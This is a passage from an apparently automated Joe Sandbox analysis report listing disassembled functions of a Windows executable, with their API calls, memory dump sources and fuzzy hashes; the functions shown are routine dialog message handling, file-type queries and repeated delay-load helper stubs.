                                                            • Opcode ID: e044ed64d0bfa049107522ab4dc00907090072b50a0a89fa567b03118e07d55b
                                                            • Instruction ID: c35489baf16aeffcf65cff35ce6a1436ea16cc505299d08679febbcb6d22957e
                                                            • Opcode Fuzzy Hash: e044ed64d0bfa049107522ab4dc00907090072b50a0a89fa567b03118e07d55b
                                                            • Instruction Fuzzy Hash: 08D012B01D02D09FD702EBAAB88671D33D4F335706FA811D1F565D15A5DB64C880CA25
                                                            Function 00BEDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00BE1B3E), ref: 00BEDD92
                                                              • Part of subcall function 00BEB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEB579
                                                              • Part of subcall function 00BEB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB58A
                                                              • Part of subcall function 00BEB568: IsDialogMessageW.USER32(0001043E,?), ref: 00BEB59E
                                                              • Part of subcall function 00BEB568: TranslateMessage.USER32(?), ref: 00BEB5AC
                                                              • Part of subcall function 00BEB568: DispatchMessageW.USER32(?), ref: 00BEB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                            • String ID:
                                                            • API String ID: 897784432-0
                                                            • Opcode ID: 49cc29156b2d5f58521c4492a235c87d9a17f612357c3d8447a85da73be8cd20
                                                            • Instruction ID: 086004acfc55852ddce7508ef0cfb2aaa841b12340013349cddf08a75bf35c0e
                                                            • Opcode Fuzzy Hash: 49cc29156b2d5f58521c4492a235c87d9a17f612357c3d8447a85da73be8cd20
                                                            • Instruction Fuzzy Hash: 1AD09E31158340BAD6022B52DD06F0F7AE2BB98B05F004594B384740F1CBB29D61DB11
                                                            Function 00BD98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,00BD97BE), ref: 00BD98C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            • Opcode ID: ffbce2b8a352bbab52afc3103c2146e9270b1761c5f022d5f679019db8807758
                                                            • Instruction ID: 93f836597addb13754fec0326268a6136dd17213948263f76420d9e22d3c72b0
                                                            • Opcode Fuzzy Hash: ffbce2b8a352bbab52afc3103c2146e9270b1761c5f022d5f679019db8807758
                                                            • Instruction Fuzzy Hash: 7CC0123840410585CE2046249844099F351EA53BE57B886D5C038891E1D323CC47FB10
                                                            Function 00BEE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7f9e7f7ff32100a6e7cbfc205a861cc81c76626505b2762484e2d1258379fe04
                                                            • Instruction ID: 296ac94097b6b4153ba4175fc63dd213602c09af41818616f11fe61b737edd35
                                                            • Opcode Fuzzy Hash: 7f9e7f7ff32100a6e7cbfc205a861cc81c76626505b2762484e2d1258379fe04
                                                            • Instruction Fuzzy Hash: 18B012D526C0C0AC310853071C42C3B018CC0C1B11B30C17EFC25C01C0FA40EC4C1432
                                                            Function 00BEE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4c0ee97275aea74672341bb11e80089e92475590f3b1d70170d297b73b66bd97
                                                            • Instruction ID: 2f085cabefa824e4e58e98330703a7ca239236362be9466ad069b709b2475671
                                                            • Opcode Fuzzy Hash: 4c0ee97275aea74672341bb11e80089e92475590f3b1d70170d297b73b66bd97
                                                            • Instruction Fuzzy Hash: 9FB012D936C1C0AC3108524B1C82C3B018CC0C0B11B30417EFC25C00C0FB40EC441532
                                                            Function 00BEE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 55d00e1f6e0673295ed63adc86289accd021f8601ee62c248960203c7d8f9657
                                                            • Instruction ID: c75aa2a41ef17f54f1f8566e0eb1c972d043e4a4b4b167c8cf9b864cfd9e73c3
                                                            • Opcode Fuzzy Hash: 55d00e1f6e0673295ed63adc86289accd021f8601ee62c248960203c7d8f9657
                                                            • Instruction Fuzzy Hash: C8B012D936C1C0BC310812471C92C3B014CC0C1B11B30857EFC21D04C0FA40EC441432
                                                            Function 00BEE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 94a7cf4731b56875f46221f9362c05b0a5f7f2e663c80583cab2fbf8e01c8d9f
                                                            • Instruction ID: f4c527ab77f7c40c0693ac6ccf438a34cf0293348bc0e3827fdd1aa94144e3b9
                                                            • Opcode Fuzzy Hash: 94a7cf4731b56875f46221f9362c05b0a5f7f2e663c80583cab2fbf8e01c8d9f
                                                            • Instruction Fuzzy Hash: 3CB012E526C0C0AC310852071D42C3B01DCC0C0B11F30417EF825C00C0FF40ED852432
                                                            Function 00BEE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4e03fdb764926e0db6bb9ad22bd0fdb97e480c47e3ebea57fb33977f22ca2e8e
                                                            • Instruction ID: 3836c55600dc9519e0cb3dd8333774ee50161e9c2eb6352bd9a672d46dcb79f6
                                                            • Opcode Fuzzy Hash: 4e03fdb764926e0db6bb9ad22bd0fdb97e480c47e3ebea57fb33977f22ca2e8e
                                                            • Instruction Fuzzy Hash: 54B012E526C0C0AC320852071C42C3B019CC0C0F11B30417EF826C00C0FA40ED441432
                                                            Function 00BEE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 99bb25c7193f92b099931bb7b834f6ff52f20afe45509f9668eaff9666b98380
                                                            • Instruction ID: b69459e66f4a6257677e50a19651357fa5711a27435bb64a11a7ba3cca87c230
                                                            • Opcode Fuzzy Hash: 99bb25c7193f92b099931bb7b834f6ff52f20afe45509f9668eaff9666b98380
                                                            • Instruction Fuzzy Hash: 42B012E526C0C0AC320852071D42C3B019CC0C0F11B30417EF826C00C0FE40EE852432
                                                            Function 00BEE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 073d3a07ded9107b3225c96e1fb99101ac4e9db242fd7d0f5a503204439ebe76
                                                            • Instruction ID: 1bfe3636df12bd5a030ddb257e64c9ec3822c6ce2fcdd769b2a4f358479f361f
                                                            • Opcode Fuzzy Hash: 073d3a07ded9107b3225c96e1fb99101ac4e9db242fd7d0f5a503204439ebe76
                                                            • Instruction Fuzzy Hash: D5B012E526C1C0BC324852071C42C3B019CC0C0F12B30427EF826C00C0FA80ED841432
                                                            Function 00BEE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ba6297c648f5472b95cb53d575fee55d3b7474e6349f20b1257160a67745ccbe
                                                            • Instruction ID: 4e6c73f8a26b71226ae1021d8c8b55c1a8d7200428b6413a5cef3168a19273bf
                                                            • Opcode Fuzzy Hash: ba6297c648f5472b95cb53d575fee55d3b7474e6349f20b1257160a67745ccbe
                                                            • Instruction Fuzzy Hash: 1AB012E526C0C0BC320852071C42C3B019CC0C1F11B30817EFC26C00C0FA40ED441432
                                                            Function 00BEE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9cc559326b7b508d09401e1e925d8d8c99a79502d582985bd5ff6dd57fc3b303
                                                            • Instruction ID: 0619d3b5fd67e00df623a803faa4da0873bdcbd7d78dbf8518966ec7df31a124
                                                            • Opcode Fuzzy Hash: 9cc559326b7b508d09401e1e925d8d8c99a79502d582985bd5ff6dd57fc3b303
                                                            • Instruction Fuzzy Hash: CAB012D526C0C0AC310853071D42C3B018CC0C0B11B30817EF825C01C0FE50ED8D2432
                                                            Function 00BEE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 523dd2c820943d3f4c7511d96b2a796c15a6b9de5b853e6eef4e823cba29c223
                                                            • Instruction ID: c55ab0efb1b4ea6ad3513010fbe87c4202d598e2ed4f3b2b2d400832b548684e
                                                            • Opcode Fuzzy Hash: 523dd2c820943d3f4c7511d96b2a796c15a6b9de5b853e6eef4e823cba29c223
                                                            • Instruction Fuzzy Hash: C3B012D536C1C0BC314853071C42C3B018CC0C0B12B30827EF825C01C0FA80EC881432
                                                            Function 00BEE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 244a1ff3813eacda0a341b18dbd7c65bad4b078a4ae1a6a435302b3c88bf5bea
                                                            • Instruction ID: bef668d9fac5f0f99bb3e377798417fd94ce8ab81bf118cd33f60446a313e5d1
                                                            • Opcode Fuzzy Hash: 244a1ff3813eacda0a341b18dbd7c65bad4b078a4ae1a6a435302b3c88bf5bea
                                                            • Instruction Fuzzy Hash: 33B012D526C0C0AC310852171C42C3B01DCC0C1B11B30817EFC25C00C0FB40EC441432
                                                            Function 00BEE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 53f6450dd967ccb98dce4ea9f0086820fc839fc8b3c6d17011faa631df4782f3
                                                            • Instruction ID: 14badadb2fd3d15554b6e9fc76d37f515f155481512cace81311f8d9a3e23a49
                                                            • Opcode Fuzzy Hash: 53f6450dd967ccb98dce4ea9f0086820fc839fc8b3c6d17011faa631df4782f3
                                                            • Instruction Fuzzy Hash: 10B012D527D0C0AC310852071C42C3B01CDC4C0B21F30417EF826C40C0FA40EC441432
                                                            Function 00BEE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
